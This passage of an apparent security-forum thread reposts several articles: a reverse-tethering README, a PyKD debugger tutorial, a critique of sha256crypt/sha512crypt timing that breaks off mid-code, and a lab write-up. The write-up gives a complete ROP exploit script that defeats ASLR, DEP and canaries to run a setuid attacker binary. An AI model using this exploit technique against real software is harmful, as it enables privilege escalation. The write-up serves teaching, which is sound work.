This project provides reverse tethering over adb for Android: it allows devices to use the internet connection of the computer they are plugged on. It does not require any root access (neither on the device nor on the computer). It works on GNU/Linux, Windows and Mac OS. Currently, it relays TCP and UDP over IPv4 traffic, but it does not support IPv6 (yet?).

Flavors
Two implementations of Gnirehtet are available: one in Java, one in Rust. Which one to choose? Use the Rust implementation. The native binary consumes less CPU and memory, and does not require a Java runtime environment. The relay server of Gnirehtet was initially only implemented in Java. As a benefit, the same "binary" runs on every platform having a Java 8 runtime installed. It is still maintained to provide a working alternative in case of problems with the Rust version.

Requirements
The Android application requires at least API 21 (Android 5.0). For the Java version only, Java 8 (JRE) is required on your computer. On Debian-based distros, install the package openjdk-8-jre.

adb
You need a recent version of adb (where adb reverse is implemented; it works with 1.0.36). It is available in the Android SDK platform tools. On Debian-based distros, you can alternatively install the package android-tools-adb. On Windows, if you need adb only for this application, just download the platform-tools and extract the following files to the gnirehtet directory: adb.exe, AdbWinApi.dll, AdbWinUsbApi.dll. Make sure you enabled adb debugging on your device(s).

Download
Download the latest release in the flavor you want.

Rust
Linux: gnirehtet-rust-linux64-v2.2.1.zip (SHA-256: 7ecb04bc7e2a223773dc9be66efafd39bb6cfb16b5cc4ccbe252f997c003bf6c)
Windows: gnirehtet-rust-win64-v2.2.1.zip (SHA-256: 1e62a5a5ade4a5f4d0b1d4a6699feedbc727eebd808cfcc152662313a1003400)
MacOS: gnirehtet-rust-macos64-v2.2.1.zip (SHA-256: 902103e6497f995e1e9b92421be212559950cca4a8b557e1f0403769aee06fc8)

Then extract it.
The Linux and MacOS archives contain: gnirehtet.apk, gnirehtet.
The Windows archive contains: gnirehtet.apk, gnirehtet.exe, gnirehtet-run.cmd.

Java
All platforms: gnirehtet-java-v2.2.1.zip (SHA-256: feb7fae78d1247247ae4ec89a5a01895c7fc4efa0965bdbfeb46396577f150db)
Then extract it. The archive contains: gnirehtet.apk, gnirehtet.jar, gnirehtet, gnirehtet.cmd, gnirehtet-run.cmd.

Run (simple)
Note: On Windows, replace ./gnirehtet by gnirehtet in the following commands.
The application has no UI, and is intended to be controlled from the computer only. If you want to activate reverse tethering for exactly one device, just execute:
./gnirehtet run
Reverse tethering remains active until you press Ctrl+C. On Windows, for convenience, you can double-click on gnirehtet-run.cmd instead (it just executes gnirehtet run, without requiring you to open a terminal). The very first start should open a popup to request permission. A "key" logo appears in the status bar whenever Gnirehtet is active.
Alternatively, you can enable reverse tethering for all connected devices (present and future) by calling:
./gnirehtet autorun

Run
You can execute the actions separately (this may be useful if you want to reverse tether several devices simultaneously).
Start the relay server and keep it open:
./gnirehtet relay
Install the apk on your Android device:
./gnirehtet install [serial]
In another terminal, for each client, execute:
./gnirehtet start [serial]
To stop a client:
./gnirehtet stop [serial]
To reset the tunnel (useful to get the connection back when a device is unplugged and plugged back while gnirehtet is active):
./gnirehtet tunnel [serial]
The serial parameter is required only if adb devices outputs more than one device.
For advanced options, call ./gnirehtet without arguments to get more details.

Run manually
The gnirehtet program exposes a simple command-line interface that executes lower-level commands. You can call them manually instead.
To start the relay server:
java -jar gnirehtet.jar relay
To install the apk:
adb install -r gnirehtet.apk
To start a client:
adb reverse localabstract:gnirehtet tcp:31416
adb shell am broadcast -a com.genymobile.gnirehtet.START \
    -n com.genymobile.gnirehtet/.GnirehtetControlReceiver
To stop a client:
adb shell am broadcast -a com.genymobile.gnirehtet.STOP \
    -n com.genymobile.gnirehtet/.GnirehtetControlReceiver

Why gnirehtet?
rev <<< tethering (in Bash)

Developers
Read the developers page.

Licence
Copyright (C) 2017 Genymobile
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Articles
Introducing "gnirehtet", a reverse tethering tool for Android (French version)
Gnirehtet 2: our reverse tethering tool for Android now available in Rust
Gnirehtet rewritten in Rust (French version)

Sursa: https://github.com/Genymobile/gnirehtet
  9. PyKD Tutorial – part 1

Published May 25, 2018 by Sιиα K.

Using WinDbg's script syntax is such an annoying thing that almost all reverse engineers have problems dealing with it, but automating debugging gives such a power that it can't easily be ignored. A good solution to this problem is using the power and simplicity of Python and WinDbg together. As you may know, WinDbg also supports C-like binaries as extensions, so there is a praiseworthy tool called PyKD which does the hard work and connects Python and WinDbg together in a straightforward and usable way. The purpose of PyKD, as they mention, is:

This project can help to automate debugging and crash dump analysis using Python. It allows one to take the best from both worlds: the expressiveness and convenience of Python with the power of WinDbg!

You can download PyKD at this link.

Setup PyKD
To find the main extension binary files, you should find the latest version of the Bootstrapper and download its x86 or x64 version depending on your needs. After extracting the binary files (pykd.dll), you should load it in WinDbg with the following command:

.load C:\Users\Sina\Desktop\pykd\x64\pykd.dll

In order to see if it loaded successfully, you should execute the following command; if you see something like this, then you're good to go.
0:000> !help
usage:

!help
    print this text

!info
    list installed python interpreters

!select version
    change default version of a python interpreter

!py [version] [options] [file]
    run python script or REPL

    Version:
    -2           : use Python2
    -2.x         : use Python2.x
    -3           : use Python3
    -3.x         : use Python3.x

    Options:
    -g --global  : run code in the common namespace
    -l --local   : run code in the isolated namespace
    -m --module  : run module as the __main__ module ( see the python command line option -m )

    command samples:
    "!py"                           : run REPL
    "!py --local"                   : run REPL in the isolated namespace
    "!py -g script.py 10 "string""  : run a script file with an argument in the commom namespace
    "!py -m module_name"            : run a named module as the __main__

!pip [version] [args]
    run pip package manager

    Version:
    -2           : use Python2
    -2.x         : use Python2.x
    -3           : use Python3
    -3.x         : use Python3.x

    pip command samples:
    "pip list"                      : show all installed packagies
    "pip install pykd"              : install pykd
    "pip install --upgrade pykd"    : upgrade pykd to the latest version
    "pip show pykd"                 : show info about pykd package

If you saw the above command suggestions, one of the interesting commands, which can be used to update PyKD, is:

!pip install --upgrade pykd

But actually, I prefer to compile the latest version from its source code rather than updating or using the pykd.dll directly. That's enough for setting up and getting started; in the rest of the post, we'll go through some useful samples of using PyKD. Note that the right way to get PyKD is to download its latest release, then find a file named "pykd.pyd" among the other DLL files and load the .pyd file.

Using PyKD Features
This section describes the general functions of PyKD.

Executing Commands
The simplest thing is using PyKD to execute a command and get its result. It can be done using the following script, in which r is our command and we simply print the result. You can also assign the result to a variable and split it up using Python's regular string functions.
import pykd
print pykd.dbgCommand("r")

You should save the above script into a file (e.g. pykd-script.py), then load it in WinDbg using the following command:

0:000> !py c:\users\Sina\desktop\pykd-script.py
rax=0000000000000000 rbx=0000000000000010 rcx=00007fffd3d5a434
rdx=0000000000000000 rsi=00007fffd3de4090 rdi=00007fffd3de4740
rip=00007fffd3d8d02c rsp=0000000b419ef3b0 rbp=0000000000000000
 r8=0000000b419ef3a8  r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000040 r13=0000000000000000
r14=0000000b41a63000 r15=000001d8da130000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!LdrInitShimEngineDynamic+0x34c:
00007fff`d3d8d02c cc int 3

As you can see, the registers' values are shown above. I usually use these kinds of scripts with t (step in) and p (step over) to simulate an instrumenting environment and check what is going on (e.g. a combination of instructions, registers' values and their corresponding memory values). Even though this operation is very slow, it is still usable for special cases.
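As a sketch of the "split it up with Python's string functions" idea (my own illustration, not from the tutorial), the register dump above can be turned into a name-to-value dict with plain string handling:

```python
def parse_registers(dump):
    """Split a WinDbg `r` register dump into a {name: int} dict,
    keeping only tokens of the form name=hexvalue."""
    regs = {}
    for token in dump.split():
        name, sep, value = token.partition("=")
        if sep and value and all(c in "0123456789abcdef" for c in value):
            regs[name] = int(value, 16)
    return regs

dump = "rax=0000000000000000 rbx=0000000000000010 iopl=0 nv up ei"
print(parse_registers(dump)["rbx"])  # 16
```

This works on the output of pykd.dbgCommand("r") as shown above; flag mnemonics and disassembly lines are skipped because they contain no name=value pair.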
Getting Register Values
A better way of getting registers is using the following sample:

import pykd
addr = hex(pykd.reg("rsp"))
print(addr)

Continue to Run
The following command is the equivalent of go in PyKD:

pykd.go()

Read the Contents of Memory
To read the contents of a specific virtual address you should use something like this:

import pykd
addr = pykd.reg("rip")
value = pykd.loadBytes(addr,16)
print(value)

The result is:

0:010> !py c:\users\Sina\desktop\pykd-script.py
[204, 195, 204, 204, 204, 204, 204, 204, 15, 31, 132, 0, 0, 0, 0, 0]

The other variants of the load functions are loadAnsiString, loadBytes, loadCStr, loadChars, loadDWords, loadDoubles, etc.

Comparing Memory
The following script returns true if the contents of memory at two virtual addresses are equal; otherwise the result is false.

import pykd
addr1 = 0x00007fffd3d31596
addr2 = 0x00007fffd3d31597
result = pykd.compareMemory(addr1,addr2,100)
print(result)

Detach
As the documentation suggests:

pykd.detachAllProcesses()  ===> Detach from all processes and resume all their threads
pykd.detachProcess()       ===> Stop process debugging

Find Nearest Valid Memory Location
The following script gives the nearest valid memory location, near to 0x0.
import pykd
result = pykd.findMemoryRegion(0x0)
print(hex(result[0]))

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
0x5d670000
0:003> dc 0x5d670000
00000000`5d670000  00905a4d 00000003 00000004 0000ffff  MZ..............
00000000`5d670010  000000b8 00000000 00000040 00000000  ........@.......
00000000`5d670020  00000000 00000000 00000000 00000000  ................
00000000`5d670030  00000000 00000000 00000000 00000128  ............(...
00000000`5d670040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
00000000`5d670050  70207369 72676f72 63206d61 6f6e6e61  is program canno
00000000`5d670060  65622074 6e757220 206e6920 20534f44  t be run in DOS
00000000`5d670070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

Finding Function Names
If you want to find what function is located at a specific address based on symbols, you should use findSymbol.
import pykd
result = pykd.findSymbol(0x00007fffd3d5d960)
print(result)

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
ntdll!DbgBreakPoint

Get Current Stack Frame

import pykd
result = pykd.getFrame()
print(result)

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
Frame: IP=7fffd3d5d960 Return=7fffd3d89bbb Frame Offset=b41effa70 Stack Offset=b41effa78
0:003> dc rsp
0000000b`41effa78  d3d89bbb 00007fff 00000000 00000000  ................
0000000b`41effa88  00000000 00000000 00000000 00000000  ................
0000000b`41effa98  00000000 00000000 00000000 00000000  ................
0000000b`41effaa8  d18e3034 00007fff 00000000 00000000  40..............
0000000b`41effab8  00000000 00000000 00000000 00000000  ................
0000000b`41effac8  00000000 00000000 00000000 00000000  ................
0000000b`41effad8  d3d31551 00007fff 00000000 00000000  Q...............
0000000b`41effae8  00000000 00000000 00000000 00000000  ................

pykd.getStack() also gives a list of stack frame objects.
Last Exception

import pykd
result = pykd.getLastException()
print(result)

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
FirstChance= True
ExceptionCode= 0x80000003
ExceptionFlags= 0x0
ExceptionRecord= 0x0
ExceptionAddress= 0x7fffd3d5d960
Param[0]= 0x0

Finding Function Locations
To get where a specific function is located you can use the following code. It's like executing x KERNEL32!CreateFileW in the WinDbg command line.

import pykd
result = pykd.getOffset("KERNEL32!CreateFileW")
print(result)

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
0x7fffd18f0940L
0:003> x kernel32!CreateFileW
00007fff`d18f0940 KERNEL32!CreateFileW (<no parameter info>)

Get System Version

import pykd
result = pykd.getSystemVersion()
print(result)

Example result:

0:003> !py c:\users\Sina\desktop\pykd-script.py
Major Version: 10
Minor Version: 0
Build: 17134
Description: 17134.1.amd64fre.rs4_release.180410-1804

Getting Page Attributes
One of the important functions of PyKD is getting page attributes.
import pykd

addr1 = pykd.reg("rip")
result = pykd.getVaProtect(addr1)
print("RIP Attributes : " + str(result))

addr2 = pykd.reg("rsp")
result = pykd.getVaProtect(addr2)
print("RSP Attributes : " + str(result))

The result is:

0:003> !py c:\users\Sina\desktop\pykd-script.py
RIP Attributes : PageExecuteRead
RSP Attributes : PageReadWrite

There is also an important function called isValid which can be used to detect whether a virtual address is valid or not.

Reading and Writing MSR Registers
If you are doing kernel debugging, you can read MSR registers using pykd.rdmsr(value).

import pykd
result = pykd.rdmsr(0x80000082)
print(result)

To write to a specific MSR you can use pykd.wrmsr(Address, Value).

That's enough for now. I'll write the rest of this post another time in part 2, so make sure to check the blog frequently. The second part is also published here!

Sursa: https://rayanfam.com/topics/pykd-tutorial-part1/
  10. ropchain

I'm going to show you how to do Project 1 Question 1 while ASLR+DEP+stack canaries are enabled. As a reminder, here's how the code looks:

void deja_vu() {
    char door[8];
    gets(door);
}

int main() {
    deja_vu();
}

A Chinese translation of this article is available here.

ASLR and DEP
We will start by defeating ASLR and DEP. The text segment of our dejavu binary will not be randomized, since it is not a position-independent executable. This means we can get around both defenses with a return oriented programming chain. Our solution is broken up into several steps:

1. Put the address of the system function from libc onto the stack.
2. Put the address of the string "s/kernel/rtsig-max" onto the stack (but possibly far from system).
3. Align the stack pointer to point to "s/kernel/rtsig-max".
4. Align edx to point to &system.
5. Call [edx]. This is equivalent to system("s/kernel/rtsig-max"), which executes an attacker-controlled binary with setuid privileges.

The string "s/kernel/rtsig-max" is mostly arbitrary; any string contained in libc which can be treated as a relative Linux path and whose address ends in a NUL byte is a valid target. It's possible to get the string "/bin/sh" on the stack instead, but that makes our attack more complicated.

Return Oriented Programming Primer
The idea behind return oriented programming is that you place the addresses of "gadgets" onto the stack. These gadgets do some (usually small) operation, and then call ret. Once we ret, that pops the address of the next gadget off the stack and jumps to that address. Our goal is to chain these small gadgets together in order to achieve arbitrary code execution. Effectively, we can think of ROP as letting us jump to any series of addresses we want, as long as the calls don't mess up our stack. The usual suspects for messing up the stack are a leave or anything which changes esp by a lot. There are tools to help find gadgets within executables.
This is useful, because sometimes gadgets can even be hidden inside other instructions! Let's run ROPgadget to see what sort of gadgets we have.

$ python ROPgadget.py --binary ../dejavu --badbytes 0a
# ...
Unique gadgets found: 86

We set a "bad byte" of 0x0a since we know that our gets function cannot write a newline. (It can write NUL bytes.) While we have a bunch of gadgets, most of them suck. Here are the few that we plan to use:

0x0804841c : dec ecx ; ret
0x0804835e : add dh, bl ; ret
0x0804857b : call dword ptr [edx]
0x080482d2 : pop ebx ; ret
0x080482bb : ret

Note that the last of these gadgets is effectively a return oriented programming NOP: it just moves esp up 4 bytes to access the next return address. We'll see later why it is useful.

The Attack
We will need to reference the disassembly quite often. Here is the disassembly of the dejavu program, excluding libc parts.

deja_vu:
   0x0804840c <+0>:  push ebp
   0x0804840d <+1>:  mov ebp,esp
   0x0804840f <+3>:  sub esp,0x28
   0x08048412 <+6>:  lea eax,[ebp-0x10]
   0x08048415 <+9>:  mov DWORD PTR [esp],eax
   0x08048418 <+12>: call 0x80482f0 <gets@plt>
   0x0804841d <+17>: leave
   0x0804841e <+18>: ret

main:
   0x0804841f <+0>:  push ebp
   0x08048420 <+1>:  mov ebp,esp
   0x08048422 <+3>:  and esp,0xfffffff0
   0x08048425 <+6>:  call 0x804840c <deja_vu>
   0x0804842a <+11>: mov eax,0x0
   0x0804842f <+16>: leave
   0x08048430 <+17>: ret

Let's take a look at the stack layout at deja_vu+18 (right before we ret from the function). It looks something like this:

/---------------------\
|       . . .         |
| saved return addr.  | <--- esp
|       . . .         |
|        door         | <--- eax, edx
|       . . .         |
|       . . .         |
|       . . .         |
|      libc_end       | <--- ecx
|       . . .         |
|       system        | <--- we want this
|       . . .         |
|     libc_start      | <--- ebx
|       . . .         |
|       . . .         |
|       . . .         |
|    dejavu .text     |
\---------------------/

Even though libc's position in code is randomized, ebx and ecx effectively "leak" information about its location. This is a result of the dynamic loader resolving the call to gets@plt.
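A small aside (my own illustration, not part of the original write-up): gadget addresses go onto the stack in little-endian byte order, which is what the p helper in the final ropchain.py does with struct.pack:

```python
from struct import pack

# Pack a 32-bit gadget address as the 4 little-endian bytes
# that gets() will write onto the stack.
p = lambda n: pack("<I", n)

rop_nop = p(0x080482bb)          # the `ret` gadget
print(rop_nop.hex())             # bb820408 - least significant byte first
```

Note that none of the chosen gadget addresses contain the bad byte 0x0a, which is exactly why ROPgadget was run with --badbytes 0a.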
How this occurs is a little complicated, so let's take it for granted. While the address of libc is randomized by ASLR, the offset of things within libc is not. For example, the system function is always 0x168494 bytes before libc_end. We want to call this function, so we need to decrease ecx by 0x168494. How can we decrease ecx? We do have a promising gadget which decrements ecx by 1:

0x0804841c : dec ecx ; ret

We would need to call this gadget 0x168494 times to get the address of system. (There are no other useful gadgets for either ecx or ebx.) Our available stack space is an order of magnitude less. However, we can use the following trick: we return to main. Because gcc aligns the stack at 16-byte intervals, we will gain stack space every time we call main. The picture below illustrates the scenario right before main+3 executes:

/---------------------\
|       . . .         |
|       4 bytes       | <--- old esp
|         sfp         | <--- esp, ebp
|       4 bytes       |
|       4 bytes       |
|       4 bytes       | <--- esp & 0xfffffff0
|       . . .         |
\---------------------/

After we call main, our program continues on to call deja_vu. This gives us another opportunity to do a buffer overflow to gain more stack space. By repeating this method a bunch of times, we can get enough stack space to do 0x168494 decrements. We need to perform all the decrements at once, since our value for ecx gets overwritten every time gets is called. We perform the same method in order to get the address of "s/kernel/rtsig-max" onto the stack.

Once we have ecx pointing to system, we now need to call that address. There is a call gadget call dword ptr [edx]. So we need some way to get the address of the value of ecx into edx. The only place where we have the opportunity to put ecx on the stack is a push ecx in _start. The _start function is called by the operating system before main and effectively loads libc, which then begins the main program.
_start:
   0x08048320 <+0>:  xor ebp,ebp
   0x08048322 <+2>:  pop esi
   0x08048323 <+3>:  mov ecx,esp
   0x08048325 <+5>:  and esp,0xfffffff0
   0x08048328 <+8>:  push eax
   0x08048329 <+9>:  push esp
   0x0804832a <+10>: push edx
   0x0804832b <+11>: push 0x80484b0
   0x08048330 <+16>: push 0x8048440
   0x08048335 <+21>: push ecx
   0x08048336 <+22>: push esi
   0x08048337 <+23>: push 0x804841f
   0x0804833c <+28>: call 0x8048310 <__libc_start_main@plt>
   0x08048341 <+33>: hlt

In order to have the program run correctly and to push ecx on the stack, we need to jump to _start+9. We could actually jump to anywhere between _start+5 and _start+11, but this will mess up our stack alignment later on. Recall that the return value of gets is stored in edx. We can use some arithmetic in order to get edx to point to one of the system calls. We do have a gadget which does arithmetic using edx and ebx:

0x0804835e : add dh, bl ; ret

If you need a reminder of how x86 registers work, look at the following diagram.

/------------------------\
|          edx           |
|             |    dx    |
|             | dh | dl  |
\------------------------/

The register edx refers to the whole 32-bit register. The register dx refers to the lower 16 bits of the register. dh and dl refer to the two 8-bit halves of those lower 16 bits. So this gadget lets us change the middle bits of edx however we want. Note we can't "overflow" dh into the top half of the register, so we cannot actually affect the top bits of edx. There is also a gadget letting us pop into ebx, so we completely control bl. We can load any value we want into ebx by putting it on the stack and then letting it get popped into the register. However, this only lets us affect the second least significant byte of edx. Since edx is also the address of the door buffer, we can change door (and hence edx) by changing our stack pointer. Therefore we can use the same stack trick of returning to main in order to align edx with the address of system.
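To make the register arithmetic concrete, here is a quick Python model (my own sketch, not from the original post) of what the add dh, bl gadget can and cannot change in edx:

```python
def add_dh_bl(edx, ebx):
    """Model `add dh, bl`: add the low byte of ebx into bits 8..15
    of edx. The addition wraps within that single byte and never
    carries into the upper 16 bits, so the top of edx is untouchable."""
    dh = (edx >> 8) & 0xff
    bl = ebx & 0xff
    dh = (dh + bl) & 0xff                    # 8-bit wrap, carry discarded
    return (edx & 0xffff00ff) | (dh << 8)

print(hex(add_dh_bl(0x11223344, 0x10)))      # 0x11224344
print(hex(add_dh_bl(0x0000ff00, 0x01)))      # 0x0 (the carry is lost)
```

This is why controlling bl via pop ebx only buys us the second least significant byte of edx, and why the remaining bytes have to be fixed up by moving the stack pointer instead.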
Now we need to align our stack pointer with our executable string so that we can use it as an argument to system. We simply use a ROP NOP (similar to a ret2ret chain):

0x080482bb : ret

After a few NOPs, our stack pointer is nearly at the right spot. We finish our ROP chain with the previously mentioned call dword ptr [edx]. gets also terminates its input with a NUL byte, which overwrites the LSB of the executable string address. (This is why we chose a string whose LSB was already 0x00.) Now we are in a ret2libc scenario: we are calling system with a pointer to a string on the stack. This runs the program as uid brown, which allows us to do whatever we want.

Stack Canaries
Let's say that we also add stack canaries. How much more difficult does this make our exploit? Debian systems always set the least significant byte of the canary to 0x00, so we only have 24 bits of entropy. We stick with the constant guess of 0x41414100 as the stack canary, and simply keep running until we get a hit. An efficient C program using syscalls can get on the order of 2,500 tries per second. Based on this, we can estimate that our program will take approximately 1.2 hours to crack the canary.

Closing Thoughts
The final ROP chain is listed in ropchain.py below. The code can be modified to create the necessary directories and executable automatically, and to work when stack canaries are enabled.
#!/usr/bin/env python2
# ropchain.py
from struct import pack

p = lambda n: pack("<I", n)

sc = []

PAD = 'A' * 20

DEC_ECX = p(0x0804841c)
RET_MAIN = p(0x0804841f)
RET_START = p(0x08048320 + 9)
POP_EBX = p(0x080482d2)
ADD_DH_BL = p(0x0804835e)
CALL_STAR_EDX = p(0x0804857b)
ROP_NOP = p(0x080482bb)
NEWLINE = '\n'

GET_16B = PAD + RET_MAIN + NEWLINE

OFFSET_BINARY = 0x450c4
OFFSET_SYSTEM = 0x168494

def load_libc_address(offset):
    sc.extend([GET_16B] * ((offset + 3) / 4))
    sc.append(PAD)
    sc.extend([DEC_ECX] * offset)
    sc.append(RET_START)
    sc.append(NEWLINE)

load_libc_address(OFFSET_SYSTEM)
load_libc_address(OFFSET_BINARY)

sc.extend([GET_16B] * 3)
sc.append(PAD + POP_EBX + p(1))
sc.append(ADD_DH_BL)
sc.extend([ROP_NOP] * 15)
sc.append(CALL_STAR_EDX)
sc.append(NEWLINE)

print(''.join(sc))

Sursa: http://www.kvakil.me/posts/ropchain/
  11. Do Not Use sha256crypt / sha512crypt - They're Dangerous

Introduction

I'd like to demonstrate why I think using sha256crypt or sha512crypt on current GNU/Linux operating systems is dangerous, and why I think the developers of GLIBC should move to scrypt or Argon2, or at least bcrypt or PBKDF2.

History and md5crypt

In 1994, Poul-Henning Kamp (PHK) added md5crypt to FreeBSD to address the weaknesses of DES-Crypt, which was common on the Unix and BSD systems of the early 1990s. DES-Crypt has a core flaw: not only is DES reversible (which isn't necessarily a problem here) and incredibly fast, but it also limited password length to 8 characters (each of those limited to 7-bit ASCII to create a 56-bit DES key). When PHK created md5crypt, one of the features he made sure to implement was support for arbitrary-length passwords. In other words, unlike DES-Crypt, a user could have a password of 9 or more characters. This was "good enough" for 1994, but it had an interesting property that I don't think PHK considered at the time: md5crypt execution time is dependent on password length.

To prove this, I wrote a simple Python script using passlib to hash passwords with md5crypt. I started with a single "a" character as my password, then increased the password length by appending more "a"s up until the password was 4,096 "a"s total.

import time
from passlib.hash import md5_crypt

md5_results = [None] * 4096

for i in xrange(0, 4096):
    print i,
    pw = "a" * (i+1)
    start = time.clock()
    md5_crypt.hash(pw)
    end = time.clock()
    md5_results[i] = end - start

with open("md5crypt.txt", "w") as f:
    for i in xrange(0, 4096):
        f.write("{0} {1}\n".format(i+1, md5_results[i]))

Nothing fancy. Start the timer, hash one "a" with md5crypt, stop the timer, and record the result. Start the timer, hash two "a"s with md5crypt, stop the timer, and record the result. Wash, rinse, repeat, until the password is 4,096 "a"s in length.
What do the timing results look like? Below are scatter plots of timing md5crypt for passwords of 1-128, 1-512, and 1-4,096 characters in length:

md5crypt 1-128 characters
md5crypt 1-512 characters
md5crypt 1-4,096 characters

At first, you wouldn't think this is a big deal; in fact, you may even think you LIKE it (we're supposed to make things get slower, right? That's a good thing, right???). But, upon deeper inspection, this actually is a flaw in the algorithm's design, for two reasons:

1. Long passwords can create a denial-of-service on the CPU (larger concern).
2. Passive observation of execution times can predict password length (smaller concern).

Now, to be fair, predicting password length based on execution time is ... meh. Let's be honest, the bulk of passwords will be between 7-10 characters. And because these algorithms operate in block sizes of 16, 32, or 64 bytes, an adversary learning "AHA! I know your password is between 1-16 characters" really isn't saying much. But should this even exist in a cryptographic primitive? Probably not.

Still, the larger concern would be users creating a DoS on the CPU, strictly by changing password length. I know what you're thinking: it's 2018, so there should be no reason why any practical-length password cannot be hashed with md5crypt insanely quickly, and you're right. Except, md5crypt was invented in 1994, 24 years ago. According to PHK, he designed it to take about 36 milliseconds on the hardware he was testing, which works out to about 28 hashes per second. So it doesn't take much to see that by increasing the password's length, you can increase execution time enough to affect a busy authentication server.

The question, though, is why? Why is the execution time dependent on password length? It's because md5crypt processes the hash for every 16 bytes in the password. As a result, this creates the stepping behavior you see in the scatter plots above. A good password hashing design would not do this.
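That per-16-byte processing is what produces the steps. A toy model (my own sketch, not the real algorithm) of where the jumps in the scatter plots land:

```python
def md5_blocks(pw_len):
    # md5crypt folds the password into the state once per 16-byte
    # block of the password, so cost steps up at 16-byte boundaries
    return (pw_len + 15) // 16

# any password from 1 to 16 characters costs the same number of passes...
assert md5_blocks(1) == md5_blocks(16) == 1
# ...and the 17th character buys you a visible jump in the plot
assert md5_blocks(17) == 2
assert md5_blocks(4096) == 256
```

Within a single step the timing is flat, which is also why an observer only learns a 16-character-wide bucket rather than the exact length.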
PHK eventually sunset md5crypt in 2012 with CVE-2012-3287. Jeremi Gosney, a professional password cracker, demonstrated with Hashcat and 8 clustered Nvidia GTX 1080Ti GPUs that a password cracker could rip through 128.4 million md5crypt guesses per second. You should no longer be implementing md5crypt for your password hashing.

sha2crypt and NIH syndrome

In 2007, Ulrich Drepper decided to improve things for GNU/Linux. He recognized the threat that GPU clusters, and even ASICs, posed for fast password cracking with md5crypt. One aspect of md5crypt was the hard-coded 1,000 iterations spent on the CPU before the password hash was finalized. This cost was not configurable. Also, MD5 was already considered broken, with SHA-1 showing severe weaknesses, so he moved to SHA-2 for the core of his design. The first thing he addressed was making the cost configurable, so that as hardware improved, you could increase the iteration count, keeping the final hash expensive for password crackers to calculate. However, he also made a couple of core changes to his design that differed from md5crypt, which ended up having some rather drastic effects on its execution.

Using code similar to the above with Python's passlib, but with the sha256_crypt() and sha512_crypt() functions instead, we can create scatter plots of sha256crypt and sha512crypt for passwords up to 128, 512, and 4,096 characters total, just like we did with md5crypt. How do they fall out? Take a look:

sha256crypt 1-128 characters
sha256crypt 1-512 characters
sha256crypt 1-4,096 characters
sha512crypt 1-128 characters
sha512crypt 1-512 characters
sha512crypt 1-4,096 characters

Curious. Not only do we see the same increasing execution time based on password length, but unlike md5crypt, that growth is polynomial. The changes Ulrich Drepper made from md5crypt are subtle, but critical.
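A toy cost model (my own simplification, not the real glibc code) captures the difference in shape: md5crypt's cost is linear in password length, while sha512crypt picks up a quadratic term from extra per-character passes over password-sized material:

```python
def md5crypt_cost(pw_len, rounds=1000):
    # password mixed into the state once per round: linear in length
    return pw_len * rounds

def sha512crypt_cost(pw_len, rounds=5000):
    # extra setup passes hash per-character material whose size itself
    # grows with the password, adding a quadratic term
    return pw_len * pw_len + pw_len * rounds

# isolate the quadratic term: doubling a long password quadruples it
extra = lambda n: sha512crypt_cost(n) - md5crypt_cost(n, rounds=5000)
assert extra(4096) == 4 * extra(2048)
```

This is only a shape argument, but it matches the plots: linear steps for md5crypt, a parabola for sha256crypt/sha512crypt.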
Essentially, not only do we process the hash for every character in the password per round, like md5crypt, but we process every character in the password three more times. First, we take the binary representation of each bit in the password, and update the hash based on whether we see a "1" or a "0". Second, for every character in the password, we update the hash. Finally, again, for every character in the password, we update the hash. For those familiar with big-O notation, we end up with an execution run time of O(pw_length^2 + pw_length * iterations).

Now, while it is true that we want our password hashing functions to be slow, we also want the iterative cost to be the driving factor in that slowness. That isn't the case with md5crypt, and it's not the case with sha256crypt or sha512crypt either. In all three cases, the password length, not the iteration count, is the driving factor in the execution time. Again, why is this a problem? To remind you:

1. Long passwords can create a denial-of-service on the CPU (larger concern).
2. Passive observation of execution times can predict password length (smaller concern).

Now, granted, in practice, people aren't carrying around 4-kilobyte passwords. If you are a web service provider, you probably don't want people uploading 5-gigabyte "passwords" to your service, creating a network denial of service. So you would probably be interested in setting an adequate password maximum, such as the 128 characters NIST recommends, to prevent that from occurring. However, if you have an adequate iterative cost (say, 640,000 rounds), then even moderately large passwords from staff, where such limits may not be imposed, could create a CPU denial of service on busy authentication servers. As with md5crypt, we don't want this.

Now, here's what I find odd about Ulrich Drepper and his design. In his post, he says about his specification (emphasis mine):

Well, there is a problem.
I can already hear everybody complaining that I suffer from the NIH syndrome but this is not the reason. The same people who object to MD5 make their decisions on what to use also based on NIST guidelines. And Blowfish is not on the lists of the NIST. Therefore bcrypt() does not solve the problem. What is on the list is AES and the various SHA hash functions. Both are viable options. The AES variant can be based upon bcrypt(), the SHA variant could be based on the MD5 variant currently implemented. Since I had to solve the problem and I consider both solutions equally secure I went with the one which involves less code. The solution we use is based on SHA. More precisely, on SHA-256 and SHA-512.

PBKDF2 was standardized as an IETF standard in September 2000, a full 7 years before Ulrich Drepper created his password hashing functions. While PBKDF2 as a whole would not be blessed by NIST until 3 years later, in December 2010 in SP 800-132, PBKDF2 can be based on functions that, as he mentioned, were already in the NIST standards. So, just like his special design that is based on SHA-2, PBKDF2 can be based on SHA-2. Where he said "I went with the one which involves less code", he should have gone with PBKDF2, as that code had already long since existed in all sorts of cryptographic software, including OpenSSL. This seems to be a very clear case of NIH syndrome. Sure, I understand not wanting to go with bcrypt, as it's not part of the NIST standards. But don't roll your own crypto either, when algorithms already exist for this very purpose that ARE based on designs that are part of NIST. So, how does PBKDF2-HMAC-SHA512 perform?
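A timing harness for it needs nothing beyond the standard library. This sketch uses hashlib.pbkdf2_hmac rather than passlib; note that HMAC pre-hashes any over-long password down to a single block, which is precisely why password length stops mattering:

```python
import hashlib
import time

def time_pbkdf2(pw_len, rounds=10000):
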